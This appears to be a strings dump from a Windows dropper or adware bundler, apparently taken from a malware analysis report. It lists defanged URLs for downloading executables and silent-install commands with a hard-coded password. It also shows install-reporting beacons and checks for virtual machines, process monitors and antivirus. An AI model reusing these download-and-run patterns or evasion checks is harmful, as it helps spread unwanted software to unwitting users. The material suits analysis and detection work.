HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E4594B8F-F580-4EF7-8787-4A4FF7AE4A8A}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E4594B8F-F580-4EF7-8787-4A4FF7AE4A8A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\JiSuZip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\JiSuZip
boost::too_few_args: format-string referred to more arguments than were passed
boost::too_many_args: format-string referred to fewer arguments than were passed
asio.misc
asio.misc error
thread.entry_event
thread.exit_event
KERNEL32.DLL
Unsupported media type
HTTP version not supported
SOCKS unsupported version
SOCKS unsupported authentication version
SOCKS command not supported
Unknown HTTP error
d:d
httponly
Sync open url '
Connect to http proxy '
Unsupported proxy '
boost thread: trying joining itself
final_url
HKEY_LOCAL_MACHINE\SOFTWARE\KHT
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
?h=X-X-X-X-X-X&r=%s_%s%s&t=%s&hid=%s&v=%s --- adadsada
?h=X-X-X-X-X-X&r=%s_%s%s&hid=%s&geturl=%s&size=%d&ok=%s&isaq=no --- sdadsada
?h=X-X-X-X-X-X&r=%s_%s%s&hid=%s&geturl=%s&finish=%s --- sdadsada
G:\SDK\poco-1.7.8-all\Foundation\include\Poco/SharedPtr.h
G:\SDK\poco-1.7.8-all\Foundation\include\Poco/String.h
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Rasapi32.dll
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
X-X-X-X-X-X
%d.%d.%d.%d
G:\SDK\poco-1.7.8-all\Foundation\include\Poco/RefCountedObject.h
%s: Couldn't find usable socket driver.
: this object doesn't support multiple channels
is not a valid key length
: this object does't support a special last block
0000000000000000
G:\pz_git\bin\Setup.pdb
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIU
.CRT$XIZ
.CRT$XLA
.CRT$XLC
.CRT$XLZ
.CRT$XPA
.CRT$XPB
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTU
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.gfids$x
.gfids$y
.tls$
.tls$ZZZ
.rsrc$01
.rsrc$02
HttpQueryInfoA
InternetOpenUrlW
WININET.dll
SHLWAPI.dll
GetProcessHeap
CreateIoCompletionPort
KERNEL32.dll
USER32.dll
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
WS2_32.dll
IPHLPAPI.DLL
VERSION.dll
GetCPInfo
PeekNamedPipe
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyA
ABEDABELABETABLEABUTACHEACIDACMEACREACTAACTSADAMADDSADENAFARAFROAGEEAHEMAHOYAIDAAIDEAIDSAIRYAJARAKINALANALECALGAALIAALLYALMAALOEALSOALTOALUMALVAAMENAMESAMIDAMMOAMOKAMOSAMRAANDYANEWANNAANNEANTEANTIAQUAARABARCHAREAARGOARIDARMYARTSARTYASIAASKSATOMAUNTAURAAUTOAVERAVIDAVISAVONAVOWAWAYAWRYBABEBABYBACHBACKBADEBAILBAITBAKEBALDBALEBALIBALKBALLBALMBANDBANEBANGBANKBARBBARDBAREBARKBARNBARRBASEBASHBASKBASSBATEBATHBAWDBAWLBEADBEAKBEAMBEANBEARBEATBEAUBECKBEEFBEENBEERBEETBELABELLBELTBENDBENTBERGBERNBERTBESSBESTBETABETHBHOYBIASBIDEBIENBILEBILKBILLBINDBINGBIRDBITEBITSBLABBLATBLEDBLEWBLOBBLOCBLOTBLOWBLUEBLUMBLURBOARBOATBOCABOCKBODEBODYBOGYBOHRBOILBOLDBOLOBOLTBOMBBONABONDBONEBONGBONNBONYBOOKBOOMBOONBOOTBOREBORGBORNBOSEBOSSBOTHBOUTBOWLBOYDBRADBRAEBRAGBRANBRAYBREDBREWBRIGBRIMBROWBUCKBUDDBUFFBULBBULKBULLBUNKBUNTBUOYBURGBURLBURNBURRBURTBURYBUSHBUSSBUSTBUSYBYTECADYCAFECAGECAINCAKECALFCALLCALMCAMECANECANTCARDCARECARLCARRCARTCASECASHCASKCASTCAVECEILCELLCENTCERNCHADCHARCHATCHAWCHEFCHENCHEWCHICCHINCHOUCHOWCHUBCHUGCHUMCITECITYCLADCLAMCLANCLAWCLAYCLODCLOGCLOTCLUBCLUECOALCOATCOCACOCKCOCOCODACODECODYCOEDCOILCOINCOKECOLACOLDCOLTCOMACOMBCOMECOOKCOOLCOONCOOTCORDCORECORKCORNCOSTCOVECOWLCRABCRAGCRAMCRAYCREWCRIBCROWCRUDCUBACUBECUFFCULLCULTCUNYCURBCURDCURECURLCURTCUTSDADEDALEDAMEDANADANEDANGDANKDAREDARKDARNDARTDASHDATADATEDAVEDAVYDAWNDAYSDEADDEAFDEALDEANDEARDEBTDECKDEEDDEEMDEERDEFTDEFYDELLDENTDENYDESKDIALDICEDIEDDIETDIMEDINEDINGDINTDIREDIRTDISCDISHDISKDIVEDOCKDOESDOLEDOLLDOLTDOMEDONEDOOMDOORDORADOSEDOTEDOUGDOURDOVEDOWNDRABDRAGDRAMDRAWDREWDRUBDRUGDRUMDUALDUCKDUCTDUELDUETDUKEDULLDUMBDUNEDUNKDUSKDUSTDUTYEACHEARLEARNEASEEASTEASYEBENECHOEDDYEDENEDGEEDGYEDITEDNAEGANELANELBAELLAELSEEMILEMITEMMAENDSERICEROSEVENEVEREVILEYEDFACEFACTFADEFAILFAINFAIRFAKEFALLFAMEFANGFARMFASTFATEFAWNFEARFEATFEEDFEELFEETFELLFELTFENDFERNFESTFEUDFIEFFIGSFILEFILLFILMFINDFINEFINKFIREFIRMFISHFISKFISTFITSFIVEFLAGFLAKFLAMFLATFLAWFLEAFLEDFLEWFLITFLOCFLOGFLOWFLUBFLUEFOALFOAMFOGYFOILFOLDFOLKFONDFONTFOODFOOLFOOTFORDFOREFORKFORMFORTFOSSFOULFOURFOWL
FRAUFRAYFREDFREEFRETFREYFROGFROMFUELFULLFUMEFUNDFUNKFURYFUSEFUSSGAFFGAGEGAILGAINGAITGALAGALEGALLGALTGAMEGANGGARBGARYGASHGATEGAULGAURGAVEGAWKGEARGELDGENEGENTGERMGETSGIBEGIFTGILDGILLGILTGINAGIRDGIRLGISTGIVEGLADGLEEGLENGLIBGLOBGLOMGLOWGLUEGLUMGLUTGOADGOALGOATGOERGOESGOLDGOLFGONEGONGGOODGOOFGOREGORYGOSHGOUTGOWNGRABGRADGRAYGREGGREWGREYGRIDGRIMGRINGRITGROWGRUBGULFGULLGUNKGURUGUSHGUSTGWENGWYNHAAGHAASHACKHAILHAIRHALEHALFHALLHALOHALTHANDHANGHANKHANSHARDHARKHARMHARTHASHHASTHATEHATHHAULHAVEHAWKHAYSHEADHEALHEARHEATHEBEHECKHEEDHEELHEFTHELDHELLHELMHERBHERDHEREHEROHERSHESSHEWNHICKHIDEHIGHHIKEHILLHILTHINDHINTHIREHISSHIVEHOBOHOCKHOFFHOLDHOLEHOLMHOLTHOMEHONEHONKHOODHOOFHOOKHOOTHORNHOSEHOSTHOURHOVEHOWEHOWLHOYTHUCKHUEDHUFFHUGEHUGHHUGOHULKHULLHUNKHUNTHURDHURLHURTHUSHHYDEHYMNIBISICONIDEAIDLEIFFYINCAINCHINTOIONSIOTAIOWAIRISIRMAIRONISLEITCHITEMIVANJACKJADEJAILJAKEJANEJAVAJEANJEFFJERKJESSJESTJIBEJILLJILTJIVEJOANJOBSJOCKJOELJOEYJOHNJOINJOKEJOLTJOVEJUDDJUDEJUDOJUDYJUJUJUKEJULYJUNEJUNKJUNOJURYJUSTJUTEKAHNKALEKANEKANTKARLKATEKEELKEENKENOKENTKERNKERRKEYSKICKKILLKINDKINGKIRKKISSKITEKLANKNEEKNEWKNITKNOBKNOTKNOWKOCHKONGKUDOKURDKURTKYLELACELACKLACYLADYLAIDLAINLAIRLAKELAMBLAMELANDLANELANGLARDLARKLASSLASTLATELAUDLAVALAWNLAWSLAYSLEADLEAFLEAKLEANLEARLEEKLEERLEFTLENDLENSLENTLEONLESKLESSLESTLETSLIARLICELICKLIEDLIENLIESLIEULIFELIFTLIKELILALILTLILYLIMALIMBLIMELINDLINELINKLINTLIONLISALISTLIVELOADLOAFLOAMLOANLOCKLOFTLOGELOISLOLALONELONGLOOKLOONLOOTLORDLORELOSELOSSLOSTLOUDLOVELOWELUCKLUCYLUGELUKELULULUNDLUNGLURALURELURKLUSHLUSTLYLELYNNLYONLYRAMACEMADEMAGIMAIDMAILMAINMAKEMALEMALIMALLMALTMANAMANNMANYMARCMAREMARKMARSMARTMARYMASHMASKMASSMASTMATEMATHMAULMAYOMEADMEALMEANMEATMEEKMEETMELDMELTMEMOMENDMENUMERTMESHMESSMICEMIKEMILDMILEMILKMILLMILTMIMIMINDMINEMINIMINKMINTMIREMISSMISTMITEMITTMOANMOATMOCKMODEMOLDMOLEMOLLMOLTMONAMONKMONTMOODMOONMOORMOOTMOREMORNMORTMOSSMOSTMOTHMOVEMUCHMUCKMUDDMUFFMULEMULLMURKMUSHMUSTMUTEMUTTMYRAMYTHNAGYNAILNAIRNAMENARYNASHNAVENAVYNEALNEARNEATNECKNEEDNEILNELLNEONNERONESSNESTNEWSNEWTNIBSNICENICK
NILENINANINENOAHNODENOELNOLLNONENOOKNOONNORMNOSENOTENOUNNOVANUDENULLNUMBOATHOBEYOBOEODINOHIOOILYOINTOKAYOLAFOLDYOLGAOLINOMANOMENOMITONCEONESONLYONTOONUSORALORGYOSLOOTISOTTOOUCHOUSTOUTSOVALOVENOVEROWLYOWNSQUADQUITQUODRACERACKRACYRAFTRAGERAIDRAILRAINRAKERANKRANTRARERASHRATERAVERAYSREADREALREAMREARRECKREEDREEFREEKREELREIDREINRENARENDRENTRESTRICERICHRICKRIDERIFTRILLRIMERINGRINKRISERISKRITEROADROAMROARROBEROCKRODEROILROLLROMEROODROOFROOKROOMROOTROSAROSEROSSROSYROTHROUTROVEROWEROWSRUBERUBYRUDERUDYRUINRULERUNGRUNSRUNTRUSERUSHRUSKRUSSRUSTRUTHSACKSAFESAGESAIDSAILSALESALKSALTSAMESANDSANESANGSANKSARASAULSAVESAYSSCANSCARSCATSCOTSEALSEAMSEARSEATSEEDSEEKSEEMSEENSEESSELFSELLSENDSENTSETSSEWNSHAGSHAMSHAWSHAYSHEDSHIMSHINSHODSHOESHOTSHOWSHUNSHUTSICKSIDESIFTSIGHSIGNSILKSILLSILOSILTSINESINGSINKSIRESITESITSSITUSKATSKEWSKIDSKIMSKINSKITSLABSLAMSLATSLAYSLEDSLEWSLIDSLIMSLITSLOBSLOGSLOTSLOWSLUGSLUMSLURSMOGSMUGSNAGSNOBSNOWSNUBSNUGSOAKSOARSOCKSODASOFASOFTSOILSOLDSOMESONGSOONSOOTSORESORTSOULSOURSOWNSTABSTAGSTANSTARSTAYSTEMSTEWSTIRSTOWSTUBSTUNSUCHSUDSSUITSULKSUMSSUNGSUNKSURESURFSWABSWAGSWAMSWANSWATSWAYSWIMSWUMTACKTACTTAILTAKETALETALKTALLTANKTASKTATETAUTTEALTEAMTEARTECHTEEMTEENTEETTELLTENDTENTTERMTERNTESSTESTTHANTHATTHEETHEMTHENTHEYTHINTHISTHUDTHUGTICKTIDETIDYTIEDTIERTILETILLTILTTIMETINATINETINTTINYTIRETOADTOGOTOILTOLDTOLLTONETONGTONYTOOKTOOLTOOTTORETORNTOTETOURTOUTTOWNTRAGTRAMTRAYTREETREKTRIGTRIMTRIOTRODTROTTROYTRUETUBATUBETUCKTUFTTUNATUNETUNGTURFTURNTUSKTWIGTWINTWITULANUNITURGEUSEDUSERUSESUTAHVAILVAINVALEVARYVASEVASTVEALVEDAVEILVEINVENDVENTVERBVERYVETOVICEVIEWVINEVISEVOIDVOLTVOTEWACKWADEWAGEWAILWAITWAKEWALEWALKWALLWALTWANDWANEWANGWANTWARDWARMWARNWARTWASHWASTWATSWATTWAVEWAVYWAYSWEAKWEALWEANWEARWEEDWEEKWEIRWELDWELLWELTWENTWEREWERTWESTWHAMWHATWHEEWHENWHETWHOAWHOMWICKWIFEWILDWILLWINDWINEWINGWINKWINOWIREWISEWISHWITHWOLFWONTWOODWOOLWORDWOREWORKWORMWORNWOVEWRITWYNNYALEYANGYANKYARDYARNYAWLYAWNYEAHYEARYELLYOGAYOKE
.?AVstl_critical_section_concrt@details@Concurrency@@
.?AVHTTPRequest@Net@Poco@@
.?AVHTTPMessage@Net@Poco@@
.?AVHTTPResponse@Net@Poco@@
.?AVHTTPClientSession@Net@Poco@@
.?AVHTTPSession@Net@Poco@@
.?AV?$BasicBufferedStreamBuf@DU?$char_traits@D@std@@VHTTPBufferAllocator@Net@Poco@@@Poco@@
.?AVHTTPHeaderStreamBuf@Net@Poco@@
.?AVHTTPHeaderIOS@Net@Poco@@
.?AVHTTPHeaderInputStream@Net@Poco@@
.?AVHTTPHeaderOutputStream@Net@Poco@@
.?AVHTTPStreamBuf@Net@Poco@@
.?AVHTTPIOS@Net@Poco@@
.?AVHTTPInputStream@Net@Poco@@
.?AVHTTPOutputStream@Net@Poco@@
.?AVHTTPFixedLengthStreamBuf@Net@Poco@@
.?AVHTTPFixedLengthIOS@Net@Poco@@
.?AVHTTPFixedLengthInputStream@Net@Poco@@
.?AVHTTPFixedLengthOutputStream@Net@Poco@@
.?AVHTTPChunkedStreamBuf@Net@Poco@@
.?AVHTTPChunkedIOS@Net@Poco@@
.?AVHTTPChunkedInputStream@Net@Poco@@
.?AVHTTPChunkedOutputStream@Net@Poco@@
.?AVwindows_file_codecvt@@
.?AVunsupported_os@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AVinvalid_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVstl_condition_variable_concrt@details@Concurrency@@
.?AV?$typeid_wrapper@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$sp_ms_deleter@Uhttp_stream_object@multi_download@avhttp@@@detail@boost@@
.?AV?$service_base@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@
.?AV?$sp_counted_impl_pd@PAUhttp_stream_object@multi_download@avhttp@@V?$sp_ms_deleter@Uhttp_stream_object@multi_download@avhttp@@@detail@boost@@@detail@boost@@
.?AU_Crt_new_delete@std@@
.?AVhttp_stream@avhttp@@
.?AV?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@
.?AUstorage_interface@avhttp@@
.?AV?$bind_t@XV?$mf4@XVmulti_download@avhttp@@HV?$shared_ptr@Uhttp_stream_object@multi_download@avhttp@@@boost@@HABVerror_code@system@4@@_mfi@boost@@V?$list5@V?$value@PAVmulti_download@avhttp@@@_bi@boost@@V?$value@H@23@V?$value@V?$shared_ptr@Uhttp_stream_object@multi_download@avhttp@@@boost@@@23@U?$arg@$01@3@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AVerror_category_impl@detail@avhttp@@
.?AV?$bind_t@XV?$mf3@XVmulti_download@avhttp@@HV?$shared_ptr@Uhttp_stream_object@multi_download@avhttp@@@boost@@ABVerror_code@system@4@@_mfi@boost@@V?$list4@V?$value@PAVmulti_download@avhttp@@@_bi@boost@@V?$value@H@23@V?$value@V?$shared_ptr@Uhttp_stream_object@multi_download@avhttp@@@boost@@@23@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf3@XVmulti_download@avhttp@@HV?$shared_ptr@Uhttp_stream_object@multi_download@avhttp@@@boost@@ABVerror_code@system@4@@_mfi@boost@@V?$list4@V?$value@PAVmulti_download@avhttp@@@_bi@boost@@V?$value@I@23@V?$value@V?$shared_ptr@Uhttp_stream_object@multi_download@avhttp@@@boost@@@23@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AVdefault_storge@avhttp@@
.?AV?$sp_counted_impl_p@Udownload_stat@multi_download@avhttp@@@detail@boost@@
.?AV?$sp_counted_impl_pd@PAVhttp_stream@avhttp@@V?$sp_ms_deleter@Vhttp_stream@avhttp@@@detail@boost@@@detail@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$sp_ms_deleter@Vhttp_stream@avhttp@@@detail@boost@@
.?AV?$service_base@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$_Ref_count@V?$vector@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@V?$allocator@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@@std@@@std@@@std@@
.?AVSimpleKeyingInterface@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AVHexEncoder@CryptoPP@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
c:\%original file name%.exe
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
3!4-42484B4L4W4q4}4
8!8-82888B8L8W8q8}8
3!3-32383B3L3W3q3}3
2%2S2
6%7X7
2 2$2(2,202
3 3$3(3,303
8!9/9>9{9
7(8,8084888
6 6$6(6_6
9 :5:::}:
: :$:(:,:0:4:8:<:@:
1 2$2(2,202
; ;$;(;,;0;4;8;~;
2(3,3034383<3
7074787 828
1,1014181
4 474=4:5
6g8d8
1 1$1(1,1014181<1
3 3)323}3
2 2$2(2,2024282<2@2
7$7(7,707
9 9$9(9,9
4 6$6(6,60646
2 2$2(2,2024282<2
3$3,383`3
; ;(;0;<;`;
-kernel32.dll
\\?\UNC\
ADVAPI32.DLL
combase.dll
advapi32.dll
minkernel\crts\ucrt\inc\corecrt_internal_strtox.h
__crt_strtox::floating_point_value::as_double
__crt_strtox::floating_point_value::as_float
..exe
mscoree.dll
ext-ms-win-ntuser-windowstation-l1-1-0
portuguese-brazilian
789:;<=>?
hXXp://xiaobingdou.com/reportInstallaa.aspx
"%s" %s
hXXp://xiaobingdou.com/reportInstallaaFinish.aspx
32:HKEY_CURRENT_USER\Software\Tencent\qqlive;64:HKEY_CURRENT_USER\Software\Tencent\qqlive
hXXp://down.yeadesktop.com/offer/thundersetup.exe
hXXp://down2.uc.cn/pcbrowser/down.php?pid=4722
hXXp://down2.uc.cn/pcbrowser/down.php?pid=4043
32:HKEY_CURRENT_USER\Software\UCBrowserPID;64:HKEY_CURRENT_USER\Software\UCBrowserPID
32:HKEY_LOCAL_MACHINE\SOFTWARE\KHT;64:HKEY_LOCAL_MACHINE\SOFTWARE\KHT
/VERYSILENT /password=G@F@!-_F4bG_@S-?gF /subid=pop3
hXXp://quadratempbayinfo.com/data/webfriend2.exe
hXXp://down.yeadesktop.com/offer/msiql.exe
hXXp://down.yeadesktop.com/offer/service.exe
hXXp://down.yeadesktop.com/offer/conhostx64.exe
hXXp://down.yeadesktop.com/offer/conhostx86.exe
32:HKEY_CURRENT_USER\Software\haitao;64:HKEY_CURRENT_USER\Software\haitao
hXXp://dl-o.1haitao.com/20002.exe
hXXp://coa.wocaoniubia.com/sss/SafeLockSetup_auto_6009.exe
hXXp://xiaobingdou.com/anzhuang.aspx
hXXp://xiaobingdou.com/jihuo.aspx
QQ.exe
procexp.exe
taskmgr.exe
AvastUI.exe
hXXp://down.yeadesktop.com/offer/test.exe
hXXp://down.yeadesktop.com/offer/tezt.exe
32:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gplyra;64:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gplyra
hXXp://b3-31d2.kxcdn.com/B3.exe
testcpu
000000000000000
0000000
Kuaizip.lnk
MaohaWiFi.lnk
Chrome_WidgetWin_1
\Microsoft\Windows\Start Menu\Programs\
%s\%s
32:HKEY_CURRENT_USER\Software\tttttt;64:HKEY_CURRENT_USER\Software\tttttt
hXXp://down.yeadesktop.com/offer/setup.exe
"%s" {8118C270CE041EA78C556FEF4C12EE48}
4 : CreateProcessErr2:%d
"%s" /VERYSILENT /password=G@F@!-_F4bG_@S-?gF /subid=pop1
32:HKEY_CURRENT_USER\Software\PC Clean Plus;64:HKEY_CURRENT_USER\Software\PC Clean Plus
hXXp://plugpackdownload.net/Pack/Download/Setup.exe
"%s" /VERYSILENT /PA=benmedia /CH=001 /N=15150
"%s" /VERYSILENT /PA=benmedia /CH=001 /N=13400
d\
/iplookup/iplookup.php
hXXp://int.dpool.sina.com.cn
?h=X-X-X-X-X-X&r=%s_%s%s&a=%d&rt=%d --- adadsada
?h=X-X-X-X-X-X&r=%s_%s%s&a=%d --- adadsada
TEST%d
hXXp://cdn3.optimizely.com/js/geo2.js
edddddd
VBoxTray.exe
VBoxService.exe
VMwareUser.exe
VMwareTray.exe
VMUpgradeHelper.exe
vmtoolsd.exe
vmacthlp.exe
Portuguese(Brazilian)
Portuguese(Standard)
Portugal
Turkey
%d / %d
Download failed:%d
GOOGLE CHROME
WebOptimum
9996655
\StringFileInfo\x\%s
#{ad498944-762f-11d0-8dcb-00c04fc3358c}

msiql.exe_1660:

.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
4444444
t.hp/P
t.hp\P
t.hXOP
j.hp:L
(%d),
(%d)================================
XC_WEB
(00356783465456)
XEle_IsShowEle
=xcgui_debug.txt
[%Y-%m-%d-%X]
(%d),name(%s)
API:%s()
,[%s]
=RegDeleteKeyExW
%d/%d/%d d:d:d
Module %d
Image Base: 0xx Image Size: 0xx
Checksum: 0xx Time Stamp: 0xx
File Size: %-10d File Time: %s
Company: %s
Product: %s
FileDesc: %s
FileVer: %d.%d.%d.%d
ProdVer: %d.%d.%d.%d
Error occurred at %s.
%s, run by %s.
Operating system: %s (%s).
%d processor(s), type %d.
%d%% memory in use.
%d MBytes physical memory.
%d MBytes physical memory free.
%d MBytes paging file.
%d MBytes paging file free.
%d MBytes user address space.
%d MBytes user address space free.
a Float Denormal Operand
a Float Invalid Operation
0xx:
EDI: 0xx ESI: 0xx EAX: 0xx
EBX: 0xx ECX: 0xx EDX: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
EFlags: 0xx ESP: 0xx SegSs: 0xx
ERRORLOG.TXT
Error creating exception report
%s caused %s (0xx)
in module %s at x:x.
Exception handler called in %s.
%s location x caused an access violation.
===== [end of %s] =====
CRASH.DMP
unknown Windows version
%u.%u.%u
Windows 95
Windows 95 SP1
Windows 95 OSR2
Windows 98
Windows 98 SP1
Windows 98 SE
Windows ME
Windows NT 3.51
Windows NT 4
Windows 2000
Windows XP
Windows 2003 Server
Windows CE
\StringFileInfo\xx\%s
F%D,3
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Visual C++ CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
MaxPolicyElementKey
pExecutionResource
Property not supported
src\DateTime.cpp
d:\sdk\poco-1.5.4\foundation\src\File_WIN32U.cpp
!_path.empty()
src\File.cpp
d:\sdk\poco-1.5.4\foundation\src\FileStream_WIN32.cpp
src\BinaryWriter.cpp
src\Path.cpp
0 <= n && n <= _dirs.size()
!_dirs.empty()
%<>{}|\"^`
https
bad or invalid port number
src\TemporaryFile.cpp
%Y-%m-%dT%H:%M:%S%z
%Y-%m-%dT%H:%M:%s%z
%w, %e %b %y %H:%M:%S %Z
%w, %e %b %Y %H:%M:%S %Z
%w, %d %b %Y %H:%M:%S %Z
%W, %e-%b-%y %H:%M:%S %Z
%W, %e %b %y %H:%M:%S %Z
%w %b %f %H:%M:%S %Y
%Y-%m-%d %H:%M:%S
src\Task.cpp
src\TextConverter.cpp
Windows 3.x
Windows NT
Windows Vista/Server 2008
Windows 7/Server 2008 R2
Windows 8/Server 2012
Windows Server 2003/Windows Server 2003 R2
Windows 95/Windows NT 4.0
x:x:x:x:x:x
src\Process.cpp
inPipe == 0 || (inPipe != outPipe && inPipe != errPipe)
src\NotificationCenter.cpp
src\ThreadPool.cpp
src\TextIterator.cpp
windows-1250
Windows-1250
windows-1251
Windows-1251
windows-1252
Windows-1252
d:\sdk\poco-1.5.4\foundation\src\bignum.h
d:\sdk\poco-1.5.4\foundation\src\bignum-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\bignum.cc
d:\sdk\poco-1.5.4\foundation\src\fast-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\strtod.cc
d:\sdk\poco-1.5.4\foundation\src\double-conversion.cc
src\NumericString.cpp
cannot create named event %s [Error %d: %s]
anonymous pipe
d:\sdk\poco-1.5.4\foundation\src\PipeImpl_WIN32.cpp
cannot allocate thread context key
cannot join thread
src\Thread.cpp
src\ErrorHandler.cpp
src\Net.cpp
Network failure while reading HTTP request header
Error reading HTTP request header
No HTTP request header
HTTP request method invalid or too long
HTTP request URI invalid or too long
Invalid HTTP version string
Unsupported Media Type
HTTP Version not supported
No HTTP response header
Invalid HTTP status code
HTTP reason string too long
HTTP/1.0
HTTP/1.1
Cannot set the port number for an already connected session
Cannot set the proxy host and port for an already connected session
Cannot set the proxy port number for an already connected session
hXXp://
src\HTTPSession.cpp
HTTP Exception
Unsupported HTTP redirect (protocol change)
FTP Exception
SMTP Exception
WebSocket Exception
Unknown or unsupported socket family.
src\MessageHeader.cpp
HttpOnly
; HttpOnly
()[]/|\',;
Invalid or unsupported address family passed to IPAddress()
0.0.0.0
Invalid address length passed to IPAddress()
Invalid prefix length passed to IPAddress()
src\SocketAddress.cpp
!hostAndPort.empty()
Missing port number
Invalid address length passed to SocketAddress()
unsupported IP address family
src\HTTPHeaderStream.cpp
src\HTTPStream.cpp
src\HTTPFixedLengthStream.cpp
src\HTTPChunkedStream.cpp
src\SocketImpl.cpp
Operation would block
Operation now in progress
Operation already in progress
Socket operation attempted on non-socket
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported
src\Socket.cpp
255.255.255.255
src\IPAddressImpl.cpp
mask() is only supported for IPv4 addresses
src\HostEntry.cpp
Invalid or unsupported address family passed to StreamSocketImpl
hXXp://VVV.appinf.com/features/no-whitespace-in-element-content
hXXp://xml.org/sax/features/validation
hXXp://xml.org/sax/features/namespaces
hXXp://xml.org/sax/features/namespace-prefixes
hXXp://xml.org/sax/features/external-general-entities
hXXp://xml.org/sax/features/external-parameter-entities
hXXp://xml.org/sax/features/string-interning
hXXp://xml.org/sax/properties/declaration-handler
hXXp://xml.org/sax/properties/lexical-handler
hXXp://VVV.appinf.com/features/enable-partial-reads
src\NamePool.cpp
src\ParserEngine.cpp
Unexpected parser state - please send a bug report
Requested feature requires XML_DTD support in Expat
!_context.empty()
Unsupported SAX feature or property identifier
src\EntityResolverImpl.cpp
src\Element.cpp
src\XMLFilterImpl.cpp
xml=hXXp://VVV.w3.org/XML/1998/namespace
unexpected parser state - please send a bug report
requested feature requires XML_DTD support in Expat
expat_2.1.0
hXXp://VVV.w3.org/XML/1998/namespace
hXXp://VVV.w3.org/2000/xmlns/
0 <= i && i < static_cast<int>(_attributes.size())
